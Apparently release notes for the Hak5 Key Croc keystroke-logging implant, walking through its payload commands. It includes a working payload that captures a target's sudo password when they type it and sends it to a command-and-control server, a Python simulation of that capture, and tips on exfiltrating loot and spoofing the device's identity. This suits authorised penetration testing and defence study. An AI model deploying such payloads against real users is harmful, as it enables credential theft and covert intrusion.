The SAVEKEYS command, coupled with MATCH, which tells a payload when to trigger, lets you save a set number of keys typed either before or after the payload is triggered. Now, in addition to that, there is UNTIL. As the name states, this allows you to save keys to a file UNTIL a specified value is typed. That value can be a simple string, a single key, or an entire regular expression!
# Trigger when the target types "sudo"
MATCH sudo
# Record keys until an ENTER, then anything, then a second ENTER has been typed
SAVEKEYS /root/loot/password.txt UNTIL \[ENTER\](.*?)\[ENTER\]
# Pause until the loot file exists, then exfil the filtered value and notify C2
WAIT_FOR_LOOT /root/loot/sudo-pass.txt
C2EXFIL STRING /root/loot/sudo-pass.txt.filtered PASSWD
C2NOTIFY INFO 'Captured Target Sudo Password'
The payload above triggers when the target types "sudo". Then it saves the keys typed to the password.txt file until the ENTER key is pressed twice. Magic!
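To see exactly what that MATCH/UNTIL pair records, here is an added Python simulation of the save-until-regex logic over a constructed keystroke log (example code, not Key Croc's own). It assumes the log renders special keys as bracketed tokens such as [ENTER], which is what the regex above implies, and that the ".filtered" file holds the pattern's capture group; the function and sample names are mine.

```python
import re

# Constructed keystroke log (not a real capture). Assumed format: printable
# keys as literal characters, special keys as bracketed tokens like [ENTER].
SAMPLE_STREAM = "ls -la[ENTER]sudo apt update[ENTER]hunter2[ENTER]exit[ENTER]"

# The UNTIL pattern from the payload above.
SUDO_UNTIL = r"\[ENTER\](.*?)\[ENTER\]"


def match_and_save_until(stream, trigger, until_regex):
    """Simulate MATCH <trigger> followed by SAVEKEYS <file> UNTIL <regex>.

    Returns (saved, filtered):
      saved    - the keys recorded after the trigger, up to the first point
                 where the UNTIL pattern is satisfied (the SAVEKEYS file)
      filtered - the pattern's first capture group, or the whole match when
                 the pattern has no group (assumed '.filtered' content)
    Returns (None, None) if the trigger never appears or the pattern never
    matches; that is the case in which WAIT_FOR_LOOT would keep the payload
    paused, because no loot file is ever written.
    """
    start = stream.find(trigger)
    if start == -1:
        return None, None
    after = stream[start + len(trigger):]
    pattern = re.compile(until_regex)
    # Feed one key at a time and stop as soon as the keys seen so far
    # satisfy the pattern, exactly like saving "until" a value is typed.
    for end in range(1, len(after) + 1):
        m = pattern.search(after[:end])
        if m:
            group = m.group(1) if m.groups() else m.group(0)
            return after[:end], group
    return None, None


if __name__ == "__main__":
    saved, secret = match_and_save_until(SAMPLE_STREAM, "sudo", SUDO_UNTIL)
    print("saved   :", repr(saved))   # ' apt update[ENTER]hunter2[ENTER]'
    print("filtered:", repr(secret))  # 'hunter2'
```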
To set an arming password, add ARMING_PASS to your config.txt. Likewise, if you'd like to set a window of time in which the button must be pressed after the password is typed, add ARMING_TIMEOUT. Thanks for the contribution 0xDade!
The QFILE command: with this you specify a separate text file containing Ducky Script that 1. doesn't need each command prefixed with QUACK and 2. doesn't require any bash special-character escaping! Perfect for large blocks of text, and it adds out-of-the-box support for so many of the existing payloads for the USB Rubber Ducky!
ENABLE_PAYLOAD and DISABLE_PAYLOAD now let you enable or disable a payload from within your payload. For example, if you only want a payload to run once, then once you've ensured that the desired loot has been obtained you can issue DISABLE_PAYLOAD file-name.txt followed by RELOAD_PAYLOADS and it won't run again. Conversely, use the ENABLE_PAYLOAD file-name.txt followed by RELOAD_PAYLOADS commands to have your first stage activate a second stage!
WAIT_FOR_KEYBOARD_ACTIVITY and WAIT_FOR_KEYBOARD_INACTIVITY are new commands that let you know whether the human operator is present or likely AFK. You can specify a timeout and an optional interval. With WAIT_FOR_KEYBOARD_INACTIVITY you can ensure that after a payload has triggered, it doesn't continue until a set amount of time has elapsed since there was any keyboard activity. WAIT_FOR_KEYBOARD_ACTIVITY can be used to pause a triggered payload until the human operator starts typing.
WAIT_FOR_LOOT. This new command pauses the payload until the specified file has been created. What if you're appending to an existing file? In that case you can specify an interval in seconds after the file name, and the payload will pause until the loot file stops growing in size. Perfect for exfiltrations! Pro tip: when exfiltrating a large directory of files, set your payload to WAIT_FOR_LOOT done.txt. Then in your exfiltration script, make sure that when your copy command has completed, you create a new file called "done.txt".
The PID can now be set with the same ATTACKMODE format from your config.txt. Now the Serial Number (SN_xxxx) and Manufacturer (MAN_xxxx), which have always been available to set from the ATTACKMODE command, can be specified from config.txt as well:

MAN MAN_Hak5
PROD PROD_KeyCroc
SN SN_1337
RNDIS_ETHERNET is for Windows targets and ECM_ETHERNET for Linux/Mac targets (or my favorite, AUTO_ETHERNET, which will try both).
Run GET_VARS in your payload and it'll export a plethora of variables. One of my favorites is $TARGET_HOSTNAME, the name of the target computer, perfect for naming loot files.
Run the GET_HELPERS command from a shell on the Key Croc.